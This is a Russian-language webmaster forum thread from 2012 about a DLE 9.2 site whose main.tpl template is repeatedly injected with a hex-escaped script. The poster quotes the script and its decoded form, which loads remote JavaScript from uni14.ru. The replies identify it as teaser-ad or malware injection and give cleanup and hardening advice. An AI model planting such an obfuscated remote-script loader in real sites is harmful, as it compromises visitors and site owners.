[X] Помощник

[CaHbka Topic Starter]

Уже несколько раз удаляют такой код с сайта:

<script language="JavaScript">document.write(unescape("%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%27%4a%61%76%61%53%63%72%69%70%74%27%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%75%6e%69%31%34%2e%72%75%2f%77%70%68%65%61%64%65%72%2e%70%68%70%3f%69%3d%31%35%39%36%33%27%3e%3c%2f%73%63%72%69%70%74%3e"))</script>

После расшифровки:

<script language="JavaScript">document.write(unescape("<script language='JavaScript' src='http://uni14.ru/wpheader.php?i=15963'></script>"))</script>

Код всегда находиться выше счетчика от Liveinternet. Код на сайте появляеться примерно раз через 10 дней. Ставят код только в одном файле main.tpl основного шаблона, другие шабы не трогают.

Версия DLE 9.2.

Подскажите что это за хрень и как лечить?

P.S. Обновлять CMS не предлагайте.

Спасибо.

[BelCoder]

Похоже на накрутку показа тизерных блоков, скорее всего была установлена не очень чистая версия движка, или же просто взлом

Если код ставится сразу перед счетчиком LI, то попробуйте удалить "<!--LiveInternet counter-->", возможно он на эту часть кода ориентируется.
Хотя если взлом и ручная простановка кода, тогда поработайте над безопасностью

Сообщение отредактировал BelCoder - 1.2.2012, 16:36

[CaHbka Topic Starter]

Такая же версия висит ещё на 4 сайтах на этом хостинге, но ломают только этот.

[fobos]

Типичный вредоносный код, внедряется в основной файл шаблона или помещается файл с кодом в папку (обычно images) и начинает заражать все файла.
Сайт был взломан или украдены пароли к сайту/ftp.

Сообщение отредактировал fobos - 1.2.2012, 16:51

[House]

Обычный код тизерки

[CaHbka Topic Starter]

Обычный код тизерки

Только яндекс теперь ругаеться на сайт =(

[bobur]

Могу за оплату найти и обезвредить...

[nick777]

* Качаете отсюда утилиты по поиску вирусов: comss.ru.
* Проверяете компьютер с помощью утилит и своего антивируса
* Настраиваете антивирус на режим повышенной безопасности
* Меняете все пароли на всех аккаунтах, ftp и т.д.
* PROFIT!

P.S. Ну и, естественно, проверяете все сайты на вирусы и удаляете код вируса.

Сообщение отредактировал nick777 - 1.2.2012, 20:30

[asAlbert]

* Качаете отсюда утилиты по поиску вирусов: comss.ru.
* Проверяете компьютер с помощью утилит и своего антивируса
* Настраиваете антивирус на режим повышенной безопасности
* Меняете все пароли на всех аккаунтах, ftp и т.д.
* PROFIT!

P.S. Ну и, естественно, проверяете все сайты на вирусы и удаляете код вируса.

Выше было сказано, что похекали только один сайт из нескольких. Если версия CMS везде одинаково, то скорее всего уязвимость в плагине, либо пробрутили пароль в админку.

[CaHbka Topic Starter]

Пароли поменял, на файлы шаблоны установил CHMOD заприщающий редактировать файлы через Админку.